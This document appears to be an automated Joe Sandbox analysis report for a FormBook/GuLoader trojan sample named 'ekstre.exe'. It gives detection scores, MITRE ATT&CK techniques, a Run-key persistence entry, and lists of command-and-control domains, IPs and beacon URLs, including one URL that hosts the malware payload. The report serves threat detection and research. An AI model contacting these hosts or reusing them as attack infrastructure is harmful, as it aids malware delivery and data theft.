Source: Yara match	File source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	4 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	1 Windows Service	1 Access Token Manipulation	3 Obfuscated Files or Information	LSASS Memory	4 System Information Discovery	Remote Desktop Protocol	1 Credential API Hooking	Exfiltration Over Bluetooth	12 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 Software Packing	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	511 Process Injection	1 Timestomp	NTDS	12 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rootkit	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Masquerading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	12 Virtualization/Sandbox Evasion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	511 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ekstre.exe	42%	Virustotal		Browse
ekstre.exe	32%	ReversingLabs	Win32.Trojan.Generic
ekstre.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\api-ms-win-core-console-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.control.exe.2f2b960.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.2.explorer.exe.1428f840.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
4.2.control.exe.51cf840.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
cursosweb22.online	0%	Virustotal		Browse
num6.17986.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.realdigitalmarketing.co.uk/mi94/?iN64=1+ICr/6rV9rD5T+b2fkS8puQwviKUFcipOdxmxkdKen6Mbo7iu+c87PDf8Q8GUw5BiYT&7ncHc8=Tv6lQt-XnpBl3ra	0%	Avira URL Cloud	safe
http://www.crosswalkconsulting.co.uk/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz	0%	Avira URL Cloud	safe
http://www.edelman-production.com/mi94/?iN64=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&7ncHc8=Tv6lQt-XnpBl3ra	0%	Avira URL Cloud	safe
http://34.138.169.8/	0%	Avira URL Cloud	safe
http://www.cursosweb22.online/mi94/?iN64=yWvflPZmA6sDTRnU+9mPZ73OUYs40Kr339wYW1rax9u/9VBDQLHJ+4R0Ww036kIARE0W&7ncHc8=Tv6lQt-XnpBl3ra	0%	Avira URL Cloud	safe
https://go.mic	0%	Avira URL Cloud	safe
http://www.anotherworldrecord.com/mi94/?iN64=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&4hKt-j=ZVzPwN	100%	Avira URL Cloud	malware
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.credit-cards-54889.com/mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra	0%	Avira URL Cloud	safe
http://www.luivix.online/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=QL/B8MzEY0HNvMy3VPGhV3P43kBHTcVAQ0SbOcVGS/U14nEiro/6l5lW3aX+iQqKLRyM	0%	Avira URL Cloud	safe
http://www.iltuosentiero.com/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW	0%	Avira URL Cloud	safe
https://go.microso	0%	Avira URL Cloud	safe
http://www.hunterboots--canada.com/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c	0%	Avira URL Cloud	safe
http://www.bestpetfinds.com/mi94/?iN64=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&7ncHc8=Tv6lQt-XnpBl3ra	0%	Avira URL Cloud	safe
http://www.laxmi.digital/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	100%	Avira URL Cloud	malware
http://go.micr	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
www.crosswalkconsulting.co.uk/mi94/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cursosweb22.online	45.132.157.81	true	true	0%, Virustotal, Browse	unknown
www.hunterboots--canada.com	199.33.123.34	true	true		unknown
www.luivix.online	66.29.145.79	true	true		unknown
parkingpage.namecheap.com	198.54.117.216	true	false		high
www.credit-cards-54889.com	185.53.179.91	true	true		unknown
www.bestpetfinds.com	112.196.98.174	true	true		unknown
iltuosentiero.com	62.149.128.45	true	true		unknown
num6.17986.net	67.21.93.229	true	true	0%, Virustotal, Browse	unknown
www.realdigitalmarketing.co.uk	212.32.237.91	true	true		unknown
ghs.googlehosted.com	142.250.186.51	true	false		unknown
www.laxmi.digital	213.186.33.5	true	true		unknown
www.doctorlinkscsk.link	unknown	unknown	true		unknown
www.edelman-production.com	unknown	unknown	true		unknown
www.aux100000epices.com	unknown	unknown	true		unknown
www.iltuosentiero.com	unknown	unknown	true		unknown
www.leqidt.tax	unknown	unknown	true		unknown
www.bril-kre-l25.buzz	unknown	unknown	true		unknown
www.anotherworldrecord.com	unknown	unknown	true		unknown
www.kevinjasperinc.africa	unknown	unknown	true		unknown
www.3ay82.xyz	unknown	unknown	true		unknown
www.fluffyjet.online	unknown	unknown	true		unknown
www.cursosweb22.online	unknown	unknown	true		unknown
www.6880365.com	unknown	unknown	true		unknown
www.crosswalkconsulting.co.uk	unknown	unknown	true		unknown
www.tmcgroup.africa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.credit-cards-54889.com/mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra	true	Avira URL Cloud: safe	unknown
http://www.anotherworldrecord.com/mi94/?iN64=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&4hKt-j=ZVzPwN	true	Avira URL Cloud: malware	unknown
http://www.cursosweb22.online/mi94/?iN64=yWvflPZmA6sDTRnU+9mPZ73OUYs40Kr339wYW1rax9u/9VBDQLHJ+4R0Ww036kIARE0W&7ncHc8=Tv6lQt-XnpBl3ra	true	Avira URL Cloud: safe	unknown
http://www.edelman-production.com/mi94/?iN64=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&7ncHc8=Tv6lQt-XnpBl3ra	false	Avira URL Cloud: safe	unknown
http://www.realdigitalmarketing.co.uk/mi94/?iN64=1+ICr/6rV9rD5T+b2fkS8puQwviKUFcipOdxmxkdKen6Mbo7iu+c87PDf8Q8GUw5BiYT&7ncHc8=Tv6lQt-XnpBl3ra	true	Avira URL Cloud: safe	unknown
http://www.luivix.online/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=QL/B8MzEY0HNvMy3VPGhV3P43kBHTcVAQ0SbOcVGS/U14nEiro/6l5lW3aX+iQqKLRyM	true	Avira URL Cloud: safe	unknown
http://www.crosswalkconsulting.co.uk/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz	true	Avira URL Cloud: safe	unknown
http://www.hunterboots--canada.com/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c	true	Avira URL Cloud: safe	unknown
http://www.iltuosentiero.com/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW	true	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	true	Avira URL Cloud: malware	unknown
http://www.laxmi.digital/mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+	true	Avira URL Cloud: safe	unknown
http://www.bestpetfinds.com/mi94/?iN64=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&7ncHc8=Tv6lQt-XnpBl3ra	true	Avira URL Cloud: safe	unknown
www.crosswalkconsulting.co.uk/mi94/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://go.mic	ekstre.exe	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/	ekstre.exe, 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmp, ekstre.exe, 00000000.00000002.1225423801.0000000002B81000.00000004.00000020.00020000.00000000.sdmp	false		high
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/	ekstre.exe, 00000002.00000003.1167675585.000000000691D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	ekstre.exe, 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ekstre.exe, 00000000.00000000.788954408.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ekstre.exe, 00000002.00000000.1056701304.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	ekstre.exe, 00000002.00000001.1058237415.0000000000626000.00000008.00000001.01000000.00000007.sdmp	false		high
http://www.gopher.ftp://ftp.	ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://go.microso	ekstre.exe	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	ekstre.exe, 00000002.00000001.1058237415.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micr	ekstre.exe	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	ekstre.exe, 00000002.00000001.1058237415.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
213.186.33.5	www.laxmi.digital	France	16276	OVHFR	true
185.53.179.91	www.credit-cards-54889.com	Germany	61969	TEAMINTERNET-ASDE	true
67.21.93.229	num6.17986.net	United States	46844	ST-BGPUS	true
66.29.145.79	www.luivix.online	United States	19538	ADVANTAGECOMUS	true
212.32.237.91	www.realdigitalmarketing.co.uk	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
2.16.241.97	unknown	European Union	20940	AKAMAI-ASN1EU	false
112.196.98.174	www.bestpetfinds.com	India	17917	QTLTELECOM-AS-APQuadrantTeleventuresLimitedIN	true
45.132.157.81	cursosweb22.online	Germany	207189	ASBLANKPROXIESGB	true
142.250.186.51	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
198.54.117.212	unknown	United States	22612	NAMECHEAP-NETUS	true
199.33.123.34	www.hunterboots--canada.com	United States	26481	REBEL-HOSTINGUS	true
34.138.169.8	unknown	United States	2686	ATGS-MMD-ASUS	true
62.149.128.45	iltuosentiero.com	Italy	31034	ARUBA-ASNIT	true
198.54.117.216	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	838028
Start date and time:	2023-03-30 14:14:49 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 19m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	ekstre.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/15@25/14
EGA Information:	Successful, ratio: 75%
HDC Information:	Successful, ratio: 71.2% (good quality ratio 65.2%) Quality average: 75.8% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 95% Number of executed functions: 118 Number of non-executed functions: 268
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.82.19.171
Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fs.microsoft.com, login.live.com, tile-service.weather.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net
Execution Graph export aborted for target ekstre.exe, PID 3348 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:27:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ZHR4_RYP C:\Program Files (x86)\Eptoxn\0ddo2htgj.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
213.186.33.5	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.laxmi.digital/mi94/?5jbDpbb=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+&7nY=sRhHpN
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.laxmi.digital/mi94/?C2JhjJw=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+&pJBdUj=sRFTt25
	_______woff.js	Get hash	malicious	Grandcrab, Gandcrab, ReflectiveLoader	Browse	www.arbezie-hotel.com/
	E-dekont.pdf.exe	Get hash	malicious	FormBook	Browse	www.borne-selfie-valence.com/me29/?1bY8X=qcBdFfXvsk0bvxVIndPZr9A/Qz9U2DXwWFmI0wg1qqauOFH5W4WB61qLlKCbAP/rnVNE&hBahkZ=8pmpbxf8J8edf
	e6UfHIk1pQ.exe	Get hash	malicious	FormBook	Browse	www.avocat-palau.com/vr21/?p4Sh=L0DLT440MTgPr&C48x5=R7zLcQHqZr+X6ggxdXW7MmnzCMNVTGSWATr2cHblfxcF1sMqLM51HEtvFiMYbM3bhg1v
	INTHIST_230714122537.vbs	Get hash	malicious	FormBook	Browse	www.osteokinesis.co.uk/sgr3/
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.jfdaels.art/mn82/?j2M=+gMlCIzJ9f8Wdy8/TYsJkzrRH52QgV0cc1yhNmutRqpelaegNd/qelxv9rHbQIP7o8v7&pVvL=1blpdZ
	NOVA ORDEM.exe	Get hash	malicious	FormBook	Browse	www.ivanseisen.com/de12/?6l=l0/XrEFv/eHM7Pjh+zbz9W7Q1lNUKrsMDoPNdy6ZcD4kZI9fXWWlinrjz9p7ouutxHhD814f9w==&lJEh=bL3PJ2y8lP
	ZJ79K2xku4.exe	Get hash	malicious	FormBook	Browse	www.avocat-palau.com/vr21/?jVwT=ihxhIfP8Z&h2=R7zLcQHqZr+X6ggxdXW7MmnzCMNVTGSWATr2cHblfxcF1sMqLM51HEtvFhsiLdXj7HUo
	w8jII3Mlbs.exe	Get hash	malicious	FormBook	Browse	www.acestrix.com/fh11/?CT6tX6=TUXA43gyZuvtyebyAN1leMx9SlssPyFj5RWmQXRmiickd5bTMlw6Y+jkB3pqdLmQNAjQ&1bYh=IdxX
	Product List Pdf.exe	Get hash	malicious	FormBook	Browse	www.acestrix.com/fh11/?fTUXzf=2d5LzBWH5p349F&NZ=TUXA43gyZuvtyebyAN1leMx9SlssPyFj5RWmQXRmiickd5bTMlw6Y+jkB3pqdLmQNAjQ
	PO 80555231 Pdf.exe	Get hash	malicious	FormBook	Browse	www.acestrix.com/fh11/?C6zP=TUXA43gyZuvtyebyAN1leMx9SlssPyFj5RWmQXRmiickd5bTMlw6Y+jkB3pqdLmQNAjQ&9rt=-ZxLQtZx7088IBLP
	DHL Notification_pdf.exe	Get hash	malicious	FormBook	Browse	www.ath0ms.tech/sz17/?f2JxxZLp=KTisIRtB1ccyHkh+bve4VKM4sDVITFDegFo8QqCHdmOEBtOoXA7vwveuV2OkyjyBk3qY&AN6Py=7nHHINv0eb_LS
	PO-003762023.exe	Get hash	malicious	FormBook	Browse	www.ianthee.com/gn92/?pZ_TDT=4hUd-n7&YV=3lvjDVYkniB0xdiuqwmEPBSCwTisfPn/Ue6JZZbNuKlKFtonTa7nFff/O3feXtNz2ZSiL0XE3g==
	BL-NO-OOLU2136901180.vbs	Get hash	malicious	FormBook	Browse	www.skillium.net/ad6t/
	Dekont.exe	Get hash	malicious	FormBook	Browse	www.gfak-consult.store/et02/?0pExU=2GPlCz9JMLtKlj2yRMXw/zOyiGjPLTY2emWmZMsOB0nj/9oNcw/HYugDB52IhAdKBi6n/hesHg==&v2J=TnZ07X8
	DHL Notification_pdff.exe	Get hash	malicious	FormBook	Browse	www.samanawavesdubai.com/g2e8/?OL0ldb=iu6W+ndK0x76kXuceTEMH3GC8JGQL2tzV1Y6nA62+KwAtwm0EZaWIMoUSGIhvkLcUTBW&cPnLl=_twxCdkpuXeHO
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.slackmails.online/b29a/?8pU4B2U=lavzTgcpWudNIpl9wCVHMWFe5CA1mdM/d5uBFHoCnhu93ZCpchtLq2kX9vC/0OHb4C68&p0=ivpl7hkhrxpDw
	G22-0416 VELOUR PO.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.luxonly.store/al36/?nTl=7nfXedippv_HZj-P&0H=Hl5rolkabwYugdqL8pa+FLtdf9PLez8+HMVYThipwSx06Y8OR3ibDiGPLY+2w116Jkwo
	ORDER INQUIRY.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.luckyluke.travel/8hmt/?Gh=Y3PnutAOOMnAvEQ2pPMQ6Yqo19pGSVstL8Za2F4Ue58gY0H0pmh7BaCd7DRNj/7xSWhVvke/9VPonO+KMR4aiyRCCd23o8NmvA==&1bp=sBkLp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.hunterboots--canada.com	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.33.121.202
parkingpage.namecheap.com	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.215
	5wQUsLdtQY.exe	Get hash	malicious	FormBook	Browse	198.54.117.216
	Arrival Notice_6648122036.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.216
	file.exe	Get hash	malicious	FormBook, Play	Browse	198.54.117.217
	rBillOfQuantity.exe	Get hash	malicious	FormBook, Play	Browse	198.54.117.212
	lmK0ia3dYS.exe	Get hash	malicious	FormBook, Play	Browse	198.54.117.218
	E-DEKONT_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.212
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.217
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.212
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.211
	XBAo84Asbf.exe	Get hash	malicious	FormBook	Browse	198.54.117.217
	FrZzJOJLcA.exe	Get hash	malicious	FormBook	Browse	198.54.117.212
	5JtW1rP950.exe	Get hash	malicious	FormBook	Browse	198.54.117.215
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.217
	Tekopa-20230316pdf.exe	Get hash	malicious	FormBook	Browse	198.54.117.216
	z23Zahlung.exe	Get hash	malicious	FormBook	Browse	198.54.117.212
	TRANSFI1990869320230401.vbs	Get hash	malicious	FormBook	Browse	198.54.117.211
	VKNJwE5C9M.exe	Get hash	malicious	FormBook	Browse	198.54.117.218
	W708aBFupP.exe	Get hash	malicious	FormBook	Browse	198.54.117.210
	rekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.217

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	orcinus.exe	Get hash	malicious	FormBook, GuLoader	Browse	145.239.37.162
	MbtddMqot9.elf	Get hash	malicious	Mirai, Moobot	Browse	176.31.173.227
	Odio.html	Get hash	malicious	HtmlDropper, Qbot	Browse	51.89.48.114
	cerber_ransomware.exe	Get hash	malicious	Cerber	Browse	149.202.64.16
	Beatae.html	Get hash	malicious	HtmlDropper	Browse	51.89.48.114
	Swift30405830330.exe	Get hash	malicious	FormBook	Browse	145.239.252.49
	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	213.186.33.5
	TTCopy-240323-PDF.exe	Get hash	malicious	FormBook	Browse	145.239.252.49
	quotation.exe	Get hash	malicious	AgentTesla	Browse	5.135.220.43
	achtung.html	Get hash	malicious	Unknown	Browse	51.222.114.20
	TNT_Original_Invoice.exe	Get hash	malicious	Remcos	Browse	51.75.209.245
	aLrUi0lW59.exe	Get hash	malicious	Laplas Clipper, Stealc, Vidar	Browse	51.195.166.203
	FedEx Address e-Form.html	Get hash	malicious	Unknown	Browse	147.135.71.233
	6Z8m42DCVd.elf	Get hash	malicious	Mirai	Browse	192.99.71.233
	QUOTATION.exe	Get hash	malicious	FormBook, GuLoader, Play	Browse	94.23.162.163
	I8Am0UQm04.exe	Get hash	malicious	RedLine	Browse	51.210.161.21
	https://norggfrt.s3.eu-west-3.amazonaws.com/NineeeerrrBighfghtctrttyrtfghghhghfgofghfginrr.html	Get hash	malicious	Phisher	Browse	146.59.116.128
	Rh7oVV7WuG.elf	Get hash	malicious	Mirai	Browse	198.27.93.37
	Monday March 2023 Request Complete.htm__ Signed_Copy_5111107658003272.htm	Get hash	malicious	HTMLPhisher	Browse	51.81.46.209
	wk1lMvJGNW.exe	Get hash	malicious	Xmrig	Browse	51.68.143.81

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\api-ms-win-core-console-l1-2-0.dll	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	GuLoader	Browse
	RFQ_(Baku_State_University)_2303EU_-_0328AZ#U00b7p.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	RFQ_(Baku_State_University)_2303EU_-_0328AZ#U00b7p.exe	Get hash	malicious	GuLoader	Browse
	BO353672UH.exe	Get hash	malicious	Remcos, GuLoader	Browse
	BO353672UH.exe	Get hash	malicious	GuLoader	Browse
	H._H._Arnold_Co._RFQ_230327#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	Solicitud_de_Cotizaci#U00f3n_(Instituto_Polit#U00e9cnic.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	H._H._Arnold_Co._RFQ_230327#U00b7pdf.exe	Get hash	malicious	GuLoader	Browse
	Solicitud_de_Cotizaci#U00f3n_(Instituto_Polit#U00e9cnic.exe	Get hash	malicious	GuLoader	Browse
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse
	E-dekont.exe	Get hash	malicious	GuLoader	Browse
	INVENT_LIST.exe	Get hash	malicious	FormBook, GuLoader	Browse
	INVENT_LIST.exe	Get hash	malicious	Unknown	Browse
	TRANSPOR.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse
